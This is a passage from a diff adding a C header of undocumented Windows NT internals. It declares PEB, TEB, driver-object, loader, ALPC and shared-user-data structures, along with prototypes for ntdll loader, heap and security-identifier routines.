DRVO_LEGACY_DRIVER 0x00000002 +#define DRVO_BUILTIN_DRIVER 0x00000004 // Driver objects for Hal, PnP Mgr +#define DRVO_REINIT_REGISTERED 0x00000008 +#define DRVO_INITIALIZED 0x00000010 +#define DRVO_BOOTREINIT_REGISTERED 0x00000020 +#define DRVO_LEGACY_RESOURCES 0x00000040 +// end_ntddk end_nthal end_ntifs end_ntosp +#define DRVO_BASE_FILESYSTEM_DRIVER 0x00000080 // A driver that is at the bottom of the filesystem stack. +// begin_ntddk begin_nthal begin_ntifs begin_ntosp + +typedef struct _DRIVER_OBJECT { + CSHORT Type; + CSHORT Size; + + // + // The following links all of the devices created by a single driver + // together on a list, and the Flags word provides an extensible flag + // location for driver objects. + // + + PDEVICE_OBJECT DeviceObject; + ULONG Flags; + + // + // The following section describes where the driver is loaded. The count + // field is used to count the number of times the driver has had its + // registered reinitialization routine invoked. + // + + PVOID DriverStart; + ULONG DriverSize; + PVOID DriverSection; //PLDR_DATA_TABLE_ENTRY + PDRIVER_EXTENSION DriverExtension; + + // + // The driver name field is used by the error log thread + // determine the name of the driver that an I/O request is/was bound. + // + + UNICODE_STRING DriverName; + + // + // The following section is for registry support. Thise is a pointer + // to the path to the hardware information in the registry + // + + PUNICODE_STRING HardwareDatabase; + + // + // The following section contains the optional pointer to an array of + // alternate entry points to a driver for "fast I/O" support. Fast I/O + // is performed by invoking the driver routine directly with separate + // parameters, rather than using the standard IRP call mechanism. Note + // that these functions may only be used for synchronous I/O, and when + // the file is cached. + // + + PFAST_IO_DISPATCH FastIoDispatch; + + // + // The following section describes the entry points to this particular + // driver. Note that the major function dispatch table must be the last + // field in the object so that it remains extensible. + // + + PVOID DriverInit; + PVOID DriverStartIo; + PVOID DriverUnload; + PVOID MajorFunction[IRP_MJ_MAXIMUM_FUNCTION + 1]; + +} DRIVER_OBJECT; +typedef struct _DRIVER_OBJECT *PDRIVER_OBJECT; + +typedef struct _LDR_RESOURCE_INFO { + ULONG_PTR Type; + ULONG_PTR Name; + ULONG Lang; +} LDR_RESOURCE_INFO, *PLDR_RESOURCE_INFO; + +typedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE { + LIST_ENTRY InLoadOrderLinks; + LIST_ENTRY InMemoryOrderLinks; + union + { + LIST_ENTRY InInitializationOrderLinks; + LIST_ENTRY InProgressLinks; + } DUMMYUNION0; + PVOID DllBase; + PVOID EntryPoint; + ULONG SizeOfImage; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; + ULONG Flags; + WORD ObsoleteLoadCount; + WORD TlsIndex; + union + { + LIST_ENTRY HashLinks; + struct + { + PVOID SectionPointer; + ULONG CheckSum; + }; + } DUMMYUNION1; + union + { + ULONG TimeDateStamp; + PVOID LoadedImports; + } DUMMYUNION2; + //fields below removed for compatibility +} LDR_DATA_TABLE_ENTRY_COMPATIBLE, *PLDR_DATA_TABLE_ENTRY_COMPATIBLE; +typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY; +typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE *PLDR_DATA_TABLE_ENTRY; +typedef LDR_DATA_TABLE_ENTRY *PCLDR_DATA_TABLE_ENTRY; + +/* +* WDM END +*/ + +/* +* NTQSI Modules START +*/ + +typedef struct _RTL_PROCESS_MODULE_INFORMATION { + HANDLE Section; + PVOID MappedBase; + PVOID ImageBase; + ULONG ImageSize; + ULONG Flags; + USHORT LoadOrderIndex; + USHORT InitOrderIndex; + USHORT LoadCount; + USHORT OffsetToFileName; + UCHAR FullPathName[256]; +} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION; + +typedef struct _RTL_PROCESS_MODULES { + ULONG NumberOfModules; + RTL_PROCESS_MODULE_INFORMATION Modules[1]; +} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES; + +/* +* NTQSI Modules END +*/ + +/* +** Virtual Memory START +*/ + +typedef enum _MEMORY_INFORMATION_CLASS +{ + MemoryBasicInformation, + MemoryWorkingSetInformation, + MemoryMappedFilenameInformation, + MemoryRegionInformation, + MemoryWorkingSetExInformation +} MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS; + +typedef struct _MEMORY_REGION_INFORMATION { + PVOID AllocationBase; + ULONG AllocationProtect; + ULONG RegionType; + SIZE_T RegionSize; +} MEMORY_REGION_INFORMATION, *PMEMORY_REGION_INFORMATION; + +/* +** Virtual Memory END +*/ + +/* +** System Firmware START +*/ + +typedef enum _SYSTEM_FIRMWARE_TABLE_ACTION +{ + SystemFirmwareTable_Enumerate, + SystemFirmwareTable_Get +} SYSTEM_FIRMWARE_TABLE_ACTION, *PSYSTEM_FIRMWARE_TABLE_ACTION; + +typedef struct _SYSTEM_FIRMWARE_TABLE_INFORMATION { + ULONG ProviderSignature; + SYSTEM_FIRMWARE_TABLE_ACTION Action; + ULONG TableID; + ULONG TableBufferLength; + UCHAR TableBuffer[ANYSIZE_ARRAY]; +} SYSTEM_FIRMWARE_TABLE_INFORMATION, *PSYSTEM_FIRMWARE_TABLE_INFORMATION; + +/* +** System Firmware END +*/ + +// +// PEB/TEB +// +typedef struct _PEB_LDR_DATA +{ + ULONG Length; + BOOLEAN Initialized; + HANDLE SsHandle; + LIST_ENTRY InLoadOrderModuleList; + LIST_ENTRY InMemoryOrderModuleList; + LIST_ENTRY InInitializationOrderModuleList; + PVOID EntryInProgress; + BOOLEAN ShutdownInProgress; + HANDLE ShutdownThreadId; +} PEB_LDR_DATA, *PPEB_LDR_DATA; + +typedef struct _GDI_HANDLE_ENTRY +{ + union + { + PVOID Object; + PVOID NextFree; + }; + union + { + struct + { + USHORT ProcessId; + USHORT Lock : 1; + USHORT Count : 15; + }; + ULONG Value; + } Owner; + USHORT Unique; + UCHAR Type; + UCHAR Flags; + PVOID UserPointer; +} GDI_HANDLE_ENTRY, *PGDI_HANDLE_ENTRY; + +#define GDI_MAX_HANDLE_COUNT 0x4000 + +typedef struct _GDI_SHARED_MEMORY +{ + GDI_HANDLE_ENTRY Handles[GDI_MAX_HANDLE_COUNT]; +} GDI_SHARED_MEMORY, *PGDI_SHARED_MEMORY; + +#define FLS_MAXIMUM_AVAILABLE 128 +#define TLS_MINIMUM_AVAILABLE 64 +#define TLS_EXPANSION_SLOTS 1024 + +#define DOS_MAX_COMPONENT_LENGTH 255 +#define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5) + +typedef struct _CURDIR +{ + UNICODE_STRING DosPath; + HANDLE Handle; +} CURDIR, *PCURDIR; + +#define RTL_USER_PROC_CURDIR_CLOSE 0x00000002 +#define RTL_USER_PROC_CURDIR_INHERIT 0x00000003 + +typedef struct _RTL_DRIVE_LETTER_CURDIR +{ + USHORT Flags; + USHORT Length; + ULONG TimeStamp; + STRING DosPath; +} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; + +#define RTL_MAX_DRIVE_LETTERS 32 +#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001 + +typedef struct _RTL_USER_PROCESS_PARAMETERS +{ + ULONG MaximumLength; + ULONG Length; + + ULONG Flags; + ULONG DebugFlags; + + HANDLE ConsoleHandle; + ULONG ConsoleFlags; + HANDLE StandardInput; + HANDLE StandardOutput; + HANDLE StandardError; + + CURDIR CurrentDirectory; + UNICODE_STRING DllPath; + UNICODE_STRING ImagePathName; + UNICODE_STRING CommandLine; + PVOID Environment; + + ULONG StartingX; + ULONG StartingY; + ULONG CountX; + ULONG CountY; + ULONG CountCharsX; + ULONG CountCharsY; + ULONG FillAttribute; + + ULONG WindowFlags; + ULONG ShowWindowFlags; + UNICODE_STRING WindowTitle; + UNICODE_STRING DesktopInfo; + UNICODE_STRING ShellInfo; + UNICODE_STRING RuntimeData; + RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; + + ULONG EnvironmentSize; + ULONG EnvironmentVersion; +} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; + +#define GDI_HANDLE_BUFFER_SIZE32 34 +#define GDI_HANDLE_BUFFER_SIZE64 60 + +#if !defined(_M_X64) +#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32 +#else +#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64 +#endif + +typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32]; +typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64]; +typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE]; + +typedef struct _PEB +{ + BOOLEAN InheritedAddressSpace; + BOOLEAN ReadImageFileExecOptions; + BOOLEAN BeingDebugged; + union + { + BOOLEAN BitField; + struct + { + BOOLEAN ImageUsesLargePages : 1; + BOOLEAN IsProtectedProcess : 1; + BOOLEAN IsLegacyProcess : 1; + BOOLEAN IsImageDynamicallyRelocated : 1; + BOOLEAN SkipPatchingUser32Forwarders : 1; + BOOLEAN SpareBits : 3; + }; + }; + HANDLE Mutant; + + PVOID ImageBaseAddress; + PPEB_LDR_DATA Ldr; + PRTL_USER_PROCESS_PARAMETERS ProcessParameters; + PVOID SubSystemData; + PVOID ProcessHeap; + PRTL_CRITICAL_SECTION FastPebLock; + PVOID AtlThunkSListPtr; + PVOID IFEOKey; + union + { + ULONG CrossProcessFlags; + struct + { + ULONG ProcessInJob : 1; + ULONG ProcessInitializing : 1; + ULONG ProcessUsingVEH : 1; + ULONG ProcessUsingVCH : 1; + ULONG ProcessUsingFTH : 1; + ULONG ReservedBits0 : 27; + }; + ULONG EnvironmentUpdateCount; + }; + union + { + PVOID KernelCallbackTable; + PVOID UserSharedInfoPtr; + }; + ULONG SystemReserved[1]; + ULONG AtlThunkSListPtr32; + PVOID ApiSetMap; + ULONG TlsExpansionCounter; + PVOID TlsBitmap; + ULONG TlsBitmapBits[2]; + PVOID ReadOnlySharedMemoryBase; + PVOID HotpatchInformation; + PVOID *ReadOnlyStaticServerData; + PVOID AnsiCodePageData; + PVOID OemCodePageData; + PVOID UnicodeCaseTableData; + + ULONG NumberOfProcessors; + ULONG NtGlobalFlag; + + LARGE_INTEGER CriticalSectionTimeout; + SIZE_T HeapSegmentReserve; + SIZE_T HeapSegmentCommit; + SIZE_T HeapDeCommitTotalFreeThreshold; + SIZE_T HeapDeCommitFreeBlockThreshold; + + ULONG NumberOfHeaps; + ULONG MaximumNumberOfHeaps; + PVOID *ProcessHeaps; + + PVOID GdiSharedHandleTable; + PVOID ProcessStarterHelper; + ULONG GdiDCAttributeList; + + PRTL_CRITICAL_SECTION LoaderLock; + + ULONG OSMajorVersion; + ULONG OSMinorVersion; + USHORT OSBuildNumber; + USHORT OSCSDVersion; + ULONG OSPlatformId; + ULONG ImageSubsystem; + ULONG ImageSubsystemMajorVersion; + ULONG ImageSubsystemMinorVersion; + ULONG_PTR ImageProcessAffinityMask; + GDI_HANDLE_BUFFER GdiHandleBuffer; + PVOID PostProcessInitRoutine; + + PVOID TlsExpansionBitmap; + ULONG TlsExpansionBitmapBits[32]; + + ULONG SessionId; + + ULARGE_INTEGER AppCompatFlags; + ULARGE_INTEGER AppCompatFlagsUser; + PVOID pShimData; + PVOID AppCompatInfo; + + UNICODE_STRING CSDVersion; + + PVOID ActivationContextData; + PVOID ProcessAssemblyStorageMap; + PVOID SystemDefaultActivationContextData; + PVOID SystemAssemblyStorageMap; + + SIZE_T MinimumStackCommit; + + PVOID *FlsCallback; + LIST_ENTRY FlsListHead; + PVOID FlsBitmap; + ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)]; + ULONG FlsHighIndex; + + PVOID WerRegistrationData; + PVOID WerShipAssertPtr; + PVOID pContextData; + PVOID pImageHeaderHash; + union + { + ULONG TracingFlags; + struct + { + ULONG HeapTracingEnabled : 1; + ULONG CritSecTracingEnabled : 1; + ULONG SpareTracingBits : 30; + }; + }; +} PEB, *PPEB; + +typedef struct _TEB_ACTIVE_FRAME_CONTEXT +{ + ULONG Flags; + PSTR FrameName; +} TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT; + +typedef struct _TEB_ACTIVE_FRAME +{ + ULONG Flags; + struct _TEB_ACTIVE_FRAME *Previous; + PTEB_ACTIVE_FRAME_CONTEXT Context; +} TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME; + +#define GDI_BATCH_BUFFER_SIZE 310 + +typedef struct _GDI_TEB_BATCH { + ULONG Offset; + UCHAR Alignment[4]; + ULONG_PTR HDC; + ULONG Buffer[GDI_BATCH_BUFFER_SIZE]; +} GDI_TEB_BATCH, *PGDI_TEB_BATCH; + +typedef struct _TEB +{ + NT_TIB NtTib; + + PVOID EnvironmentPointer; + CLIENT_ID ClientId; + PVOID ActiveRpcHandle; + PVOID ThreadLocalStoragePointer; + PPEB ProcessEnvironmentBlock; + + ULONG LastErrorValue; + ULONG CountOfOwnedCriticalSections; + PVOID CsrClientThread; + PVOID Win32ThreadInfo; + ULONG User32Reserved[26]; + ULONG UserReserved[5]; + PVOID WOW32Reserved; + LCID CurrentLocale; + ULONG FpSoftwareStatusRegister; + PVOID SystemReserved1[54]; + NTSTATUS ExceptionCode; + PVOID ActivationContextStackPointer; +#if defined(_M_X64) + UCHAR SpareBytes[24]; +#else + UCHAR SpareBytes[36]; +#endif + ULONG TxFsContext; + + GDI_TEB_BATCH GdiTebBatch; + CLIENT_ID RealClientId; + HANDLE GdiCachedProcessHandle; + ULONG GdiClientPID; + ULONG GdiClientTID; + PVOID GdiThreadLocalInfo; + ULONG_PTR Win32ClientInfo[62]; + PVOID glDispatchTable[233]; + ULONG_PTR glReserved1[29]; + PVOID glReserved2; + PVOID glSectionInfo; + PVOID glSection; + PVOID glTable; + PVOID glCurrentRC; + PVOID glContext; + + NTSTATUS LastStatusValue; + UNICODE_STRING StaticUnicodeString; + WCHAR StaticUnicodeBuffer[261]; + + PVOID DeallocationStack; + PVOID TlsSlots[64]; + LIST_ENTRY TlsLinks; + + PVOID Vdm; + PVOID ReservedForNtRpc; + PVOID DbgSsReserved[2]; + + ULONG HardErrorMode; +#if defined(_M_X64) + PVOID Instrumentation[11]; +#else + PVOID Instrumentation[9]; +#endif + GUID ActivityId; + + PVOID SubProcessTag; + PVOID EtwLocalData; + PVOID EtwTraceData; + PVOID WinSockData; + ULONG GdiBatchCount; + + union + { + PROCESSOR_NUMBER CurrentIdealProcessor; + ULONG IdealProcessorValue; + struct + { + UCHAR ReservedPad0; + UCHAR ReservedPad1; + UCHAR ReservedPad2; + UCHAR IdealProcessor; + }; + }; + + ULONG GuaranteedStackBytes; + PVOID ReservedForPerf; + PVOID ReservedForOle; + ULONG WaitingOnLoaderLock; + PVOID SavedPriorityState; + ULONG_PTR SoftPatchPtr1; + PVOID ThreadPoolData; + PVOID *TlsExpansionSlots; +#if defined(_M_X64) + PVOID DeallocationBStore; + PVOID BStoreLimit; +#endif + ULONG MuiGeneration; + ULONG IsImpersonating; + PVOID NlsCache; + PVOID pShimData; + ULONG HeapVirtualAffinity; + HANDLE CurrentTransactionHandle; + PTEB_ACTIVE_FRAME ActiveFrame; + PVOID FlsData; + + PVOID PreferredLanguages; + PVOID UserPrefLanguages; + PVOID MergedPrefLanguages; + ULONG MuiImpersonation; + + union + { + USHORT CrossTebFlags; + USHORT SpareCrossTebBits : 16; + }; + union + { + USHORT SameTebFlags; + struct + { + USHORT SafeThunkCall : 1; + USHORT InDebugPrint : 1; + USHORT HasFiberData : 1; + USHORT SkipThreadAttach : 1; + USHORT WerInShipAssertCode : 1; + USHORT RanProcessInit : 1; + USHORT ClonedThread : 1; + USHORT SuppressDebugMsg : 1; + USHORT DisableUserStackWalk : 1; + USHORT RtlExceptionAttached : 1; + USHORT InitialThread : 1; + USHORT SpareSameTebBits : 1; + }; + }; + + PVOID TxnScopeEnterCallback; + PVOID TxnScopeExitCallback; + PVOID TxnScopeContext; + ULONG LockCount; + ULONG SpareUlong0; + PVOID ResourceRetValue; +} TEB, *PTEB; + +__inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; } + +/* +** PEB/TEB END +*/ + +/* +** ALPC START +*/ + +typedef struct _PORT_MESSAGE { + union { + struct { + CSHORT DataLength; + CSHORT TotalLength; + } s1; + ULONG Length; + } u1; + union { + struct { + CSHORT Type; + CSHORT DataInfoOffset; + } s2; + ULONG ZeroInit; + } u2; + union { + CLIENT_ID ClientId; + double DoNotUseThisField; // Force quadword alignment + } u3; + ULONG MessageId; + union { + ULONG ClientViewSize; // Only valid on LPC_CONNECTION_REQUEST message + ULONG CallbackId; // Only valid on LPC_REQUEST message + } u4; + UCHAR Reserved[8]; +} PORT_MESSAGE, *PPORT_MESSAGE; + +// end_ntsrv + +typedef struct _PORT_DATA_ENTRY { + PVOID Base; + ULONG Size; +} PORT_DATA_ENTRY, *PPORT_DATA_ENTRY; + +typedef struct _PORT_DATA_INFORMATION { + ULONG CountDataEntries; + PORT_DATA_ENTRY DataEntries[1]; +} PORT_DATA_INFORMATION, *PPORT_DATA_INFORMATION; + +#define LPC_REQUEST 1 +#define LPC_REPLY 2 +#define LPC_DATAGRAM 3 +#define LPC_LOST_REPLY 4 +#define LPC_PORT_CLOSED 5 +#define LPC_CLIENT_DIED 6 +#define LPC_EXCEPTION 7 +#define LPC_DEBUG_EVENT 8 +#define LPC_ERROR_EVENT 9 +#define LPC_CONNECTION_REQUEST 10 + +#define PORT_VALID_OBJECT_ATTRIBUTES (OBJ_CASE_INSENSITIVE) +#define PORT_MAXIMUM_MESSAGE_LENGTH 256 + +typedef struct _LPC_CLIENT_DIED_MSG { + PORT_MESSAGE PortMsg; + LARGE_INTEGER CreateTime; +} LPC_CLIENT_DIED_MSG, *PLPC_CLIENT_DIED_MSG; + +typedef struct _PORT_VIEW { + ULONG Length; + HANDLE SectionHandle; + ULONG SectionOffset; + ULONG ViewSize; + PVOID ViewBase; + PVOID ViewRemoteBase; +} PORT_VIEW, *PPORT_VIEW; + +typedef struct _REMOTE_PORT_VIEW { + ULONG Length; + ULONG ViewSize; + PVOID ViewBase; +} REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW; + +/* +** ALPC END +*/ + +/* +** KUSER_SHARED_DATA START +*/ + +typedef struct _KSYSTEM_TIME { + ULONG LowPart; + LONG High1Time; + LONG High2Time; +} KSYSTEM_TIME, *PKSYSTEM_TIME; + +typedef enum _NT_PRODUCT_TYPE { + NtProductWinNt = 1, + NtProductLanManNt, + NtProductServer +} NT_PRODUCT_TYPE, *PNT_PRODUCT_TYPE; + +#define PROCESSOR_FEATURE_MAX 64 + +typedef enum _ALTERNATIVE_ARCHITECTURE_TYPE { + StandardDesign, // None == 0 == standard design + NEC98x86, // NEC PC98xx series on X86 + EndAlternatives // past end of known alternatives +} ALTERNATIVE_ARCHITECTURE_TYPE; + +// +// Define Address of User Shared Data +// +#define MM_SHARED_USER_DATA_VA 0x000000007FFE0000 + +// +// WARNING: this definition is compatibility only. +// Structure is incomplete. Only important fields. +// +typedef struct _KUSER_SHARED_DATA_COMPAT { + ULONG TickCountLowDeprecated; + ULONG TickCountMultiplier; + volatile KSYSTEM_TIME InterruptTime; + volatile KSYSTEM_TIME SystemTime; + volatile KSYSTEM_TIME TimeZoneBias; + USHORT ImageNumberLow; + USHORT ImageNumberHigh; + WCHAR NtSystemRoot[260]; + ULONG MaxStackTraceDepth; + ULONG CryptoExponent; + ULONG TimeZoneId; + ULONG LargePageMinimum; + + union { + ULONG Reserved2[7]; + struct { + ULONG AitSamplingValue; + ULONG AppCompatFlag; + struct { + ULONG LowPart; + ULONG HighPart; + } RNGSeedVersion; + ULONG GlobalValidationRunlevel; + ULONG TimeZoneBiasStamp; + ULONG ReservedField; + }; + }; + + NT_PRODUCT_TYPE NtProductType; + BOOLEAN ProductTypeIsValid; + ULONG NtMajorVersion; + ULONG NtMinorVersion; + BOOLEAN ProcessorFeatures[PROCESSOR_FEATURE_MAX]; + ULONG Reserved1; + ULONG Reserved3; + volatile ULONG TimeSlip; + ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture; + ULONG AltArchitecturePad; + LARGE_INTEGER SystemExpirationDate; + ULONG SuiteMask; + BOOLEAN KdDebuggerEnabled; + + union { + UCHAR MitigationPolicies; + struct { + UCHAR NXSupportPolicy : 2; + UCHAR SEHValidationPolicy : 2; + UCHAR CurDirDevicesSkippedForDlls : 2; + UCHAR Reserved : 2; + UCHAR Reserved6[2]; + }; + }; + + volatile ULONG ActiveConsoleId; + volatile ULONG DismountCount; + ULONG ComPlusPackage; + ULONG LastSystemRITEventTickCount; + ULONG NumberOfPhysicalPages; + BOOLEAN SafeBootMode; + UCHAR Reserved12[3]; + + union { + ULONG SharedDataFlags; + struct { + ULONG DbgErrorPortPresent : 1; + ULONG DbgElevationEnabled : 1; + ULONG DbgVirtEnabled : 1; + ULONG DbgInstallerDetectEnabled: 1; + ULONG DbgLkgEnabled : 1; + ULONG DbgDynProcessorEnabled : 1; + ULONG DbgConsoleBrokerEnabled : 1; + ULONG DbgSecureBootEnabled : 1; + ULONG DbgMultiSessionSku : 1; + ULONG SpareBits : 23; + }; + }; + + //incomplete + +} KUSER_SHARED_DATA, *PKUSER_SHARED_DATA; + +#define USER_SHARED_DATA ((KUSER_SHARED_DATA * const)MM_SHARED_USER_DATA_VA) + +/* +** KUSER_SHARED_DATA END +*/ + +/* +** LDR START +*/ + +typedef +VOID(NTAPI *PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)( + _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry, + _In_ PVOID Context, + _In_ OUT BOOLEAN *StopEnumeration + ); + +NTSTATUS NTAPI LdrEnumerateLoadedModules( + _In_opt_ ULONG Flags, + _In_ PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction, + _In_opt_ PVOID Context + ); + +NTSTATUS NTAPI LdrGetProcedureAddress( + _In_ PVOID DllHandle, + _In_opt_ CONST ANSI_STRING* ProcedureName, + _In_opt_ ULONG ProcedureNumber, + _Out_ PVOID *ProcedureAddress + ); + +NTSTATUS NTAPI LdrLoadDll( + _In_opt_ PCWSTR DllPath, + _In_opt_ PULONG DllCharacteristics, + _In_ PCUNICODE_STRING DllName, + _Out_ PVOID *DllHandle + ); + +NTSTATUS NTAPI LdrUnloadDll( + _In_ PVOID DllHandle + ); + +NTSTATUS NTAPI LdrGetDllHandle( + _In_opt_ PCWSTR DllPath OPTIONAL, + _In_opt_ PULONG DllCharacteristics OPTIONAL, + _In_ PCUNICODE_STRING DllName, + _Out_ PVOID *DllHandle + ); + +NTSTATUS NTAPI LdrFindResource_U( + _In_ PVOID DllHandle, + _In_ CONST ULONG_PTR* ResourceIdPath, + _In_ ULONG ResourceIdPathLength, + _Out_ PIMAGE_RESOURCE_DATA_ENTRY *ResourceDataEntry + ); + +NTSTATUS NTAPI LdrAccessResource( + _In_ PVOID DllHandle, + _In_ CONST IMAGE_RESOURCE_DATA_ENTRY* ResourceDataEntry, + _Out_opt_ PVOID *Address, + _Out_opt_ PULONG Size + ); + +NTSTATUS NTAPI LdrFindEntryForAddress( + _In_ PVOID Address, + _Out_ PLDR_DATA_TABLE_ENTRY *TableEntry + ); + +/* +** LDR END +*/ + +/* +** Csr Runtime START +*/ + +ULONG NTAPI CsrGetProcessId( + ); + +/* +** Csr Runtime END +*/ + +/* +** Runtime Library API START +*/ + +ULONG NTAPI RtlRandomEx( + _Inout_ PULONG Seed + ); + +PVOID NTAPI RtlAddVectoredExceptionHandler( + _In_ ULONG First, + _In_ PVECTORED_EXCEPTION_HANDLER Handler + ); + +ULONG NTAPI RtlRemoveVectoredExceptionHandler( + _In_ PVOID Handle + ); + +VOID NTAPI RtlPushFrame( + _In_ PTEB_ACTIVE_FRAME Frame + ); + +VOID NTAPI RtlPopFrame( + _In_ PTEB_ACTIVE_FRAME Frame + ); + +PTEB_ACTIVE_FRAME NTAPI RtlGetFrame( + VOID + ); + +VOID NTAPI RtlInitUnicodeString( + _Inout_ PUNICODE_STRING DestinationString, + _In_ PCWSTR SourceString + ); + +BOOLEAN NTAPI RtlEqualUnicodeString( + _In_ PCUNICODE_STRING String1, + _In_ PCUNICODE_STRING String2, + _In_ BOOLEAN CaseInSensitive + ); + +BOOLEAN NTAPI RtlPrefixUnicodeString( + _In_ PCUNICODE_STRING String1, + _In_ PCUNICODE_STRING String2, + _In_ BOOLEAN CaseInSensitive + ); + +NTSTATUS NTAPI RtlGetVersion( + _Inout_ PRTL_OSVERSIONINFOW lpVersionInformation + ); + +ULONG NTAPI RtlNtStatusToDosError( + _In_ NTSTATUS Status + ); + +NTSTATUS NTAPI RtlGetOwnerSecurityDescriptor( + _In_ PSECURITY_DESCRIPTOR SecurityDescriptor, + _Out_ PSID *Owner, + _Out_ PBOOLEAN OwnerDefaulted + ); + +NTSTATUS NTAPI RtlGetGroupSecurityDescriptor( + _In_ PSECURITY_DESCRIPTOR SecurityDescriptor, + _Out_ PSID *Group, + _Out_ PBOOLEAN GroupDefaulted + ); + +NTSTATUS NTAPI RtlGetDaclSecurityDescriptor( + _In_ PSECURITY_DESCRIPTOR SecurityDescriptor, + _Out_ PBOOLEAN DaclPresent, + _Out_ PACL *Dacl, + _Out_ PBOOLEAN DaclDefaulted + ); + +NTSTATUS NTAPI RtlGetSaclSecurityDescriptor( + _In_ PSECURITY_DESCRIPTOR SecurityDescriptor, + _Out_ PBOOLEAN SaclPresent, + _Out_ PACL *Sacl, + _Out_ PBOOLEAN SaclDefaulted + ); + +ULONG NTAPI RtlLengthSecurityDescriptor( + _In_ PSECURITY_DESCRIPTOR SecurityDescriptor + ); + +VOID NTAPI RtlMapGenericMask( + _In_ PACCESS_MASK AccessMask, + _In_ PGENERIC_MAPPING GenericMapping + ); + +VOID NTAPI RtlInitString( + PSTRING DestinationString, + PCSZ SourceString + ); + +NTSTATUS NTAPI RtlExpandEnvironmentStrings_U( + _In_opt_ PVOID Environment, + _In_ PCUNICODE_STRING Source, + _Out_ PUNICODE_STRING Destination, + _Out_opt_ PULONG ReturnedLength + ); + +VOID NTAPI RtlSetLastWin32Error( + LONG Win32Error + ); + +PVOID NTAPI RtlAllocateHeap( + _In_ PVOID HeapHandle, + _In_ ULONG Flags, + _In_ SIZE_T Size + ); + +BOOLEAN NTAPI RtlFreeHeap( + _In_ PVOID HeapHandle, + _In_ ULONG Flags, + _In_ PVOID BaseAddress + ); + +BOOLEAN NTAPI RtlValidSid( + PSID Sid + ); + +BOOLEAN NTAPI RtlEqualSid( + PSID Sid1, + PSID Sid2 + ); + +BOOLEAN NTAPI RtlEqualPrefixSid( + PSID Sid1, + PSID Sid2 + ); + +ULONG NTAPI RtlLengthRequiredSid( + ULONG SubAuthorityCount + ); + +PVOID NTAPI RtlFreeSid( + IN PSID Sid + ); + +NTSTATUS NTAPI RtlAllocateAndInitializeSid( + IN PSID_IDENTIFIER_AUTHORITY IdentifierAuthority, + IN UCHAR SubAuthorityCount, + IN ULONG SubAuthority0, + IN ULONG SubAuthority1, + IN ULONG SubAuthority2, + IN ULONG SubAuthority3, + IN ULONG SubAuthority4, + IN ULONG SubAuthority5, + IN ULONG SubAuthority6, + IN ULONG SubAuthority7, + OUT PSID *Sid + ); + +NTSTATUS NTAPI RtlInitializeSid( + PSID Sid, + PSID_IDENTIFIER_AUTHORITY IdentifierAuthority, + UCHAR SubAuthorityCount + ); + +PSID_IDENTIFIER_AUTHORITY NTAPI RtlIdentifierAuthoritySid( + PSID Sid + ); + +PULONG NTAPI RtlSubAuthoritySid( + PSID Sid, + ULONG SubAuthority + ); + +PUCHAR NTAPI RtlSubAuthorityCountSid( + PSID Sid + ); + +ULONG NTAPI RtlLengthSid( + PSID Sid + ); + +NTSTATUS NTAPI RtlCopySid( + ULONG DestinationSidLength, + PSID DestinationSid, + PSID SourceSid + ); + +NTSTATUS NTAPI RtlCopySidAndAttributesArray( + ULONG ArrayLength, + PSID_AND_ATTRIBUTES Source, + ULONG TargetSidBufferSize, + PSID_AND_ATTRIBUTES TargetArrayElement, + PSID TargetSid, + PSID *NextTargetSid, + PULONG RemainingTargetSidSize + ); + +NTSTATUS NTAPI RtlLengthSidAsUnicodeString( + PSID Sid, + PULONG StringLength + ); + +NTSTATUS NTAPI RtlConvertSidToUnicodeString( + PUNICODE_STRING UnicodeString, + PSID Sid, + BOOLEAN AllocateDestinationString + ); + +NTSTATUS NTAPI RtlCreateSecurityDescriptor( + PSECURITY_DESCRIPTOR SecurityDescriptor, + ULONG Revision + ); + +NTSTATUS NTAPI RtlSetOwnerSecurityDescriptor( + PSECURITY_DESCRIPTOR SecurityDescriptor, + PSID Owner, + BOOLEAN OwnerDefaulted + ); + +FORCEINLINE LUID +NTAPI +RtlConvertLongToLuid( + LONG Long + ) +{ + LUID TempLuid; + LARGE_INTEGER TempLi; + + TempLi.QuadPart = Long; + TempLuid.LowPart = TempLi.LowPart; + TempLuid.HighPart = TempLi.HighPart; + return(TempLuid); +} + +NTSTATUS NTAPI RtlFormatCurrentUserKeyPath( + _Out_ PUNICODE_STRING CurrentUserKeyPath + ); + +VOID NTAPI RtlFreeUnicodeString( + PUNICODE_STRING UnicodeString + ); + +VOID NTAPI RtlFreeAnsiString( + PANSI_STRING AnsiString + ); + +NTSTATUS NTAPI RtlAnsiStringToUnicodeString( + PUNICODE_STRING DestinationString, + PCANSI_STRING SourceString, + BOOLEAN AllocateDestinationString + ); + +BOOLEAN NTAPI RtlDosPathNameToNtPathName_U( + 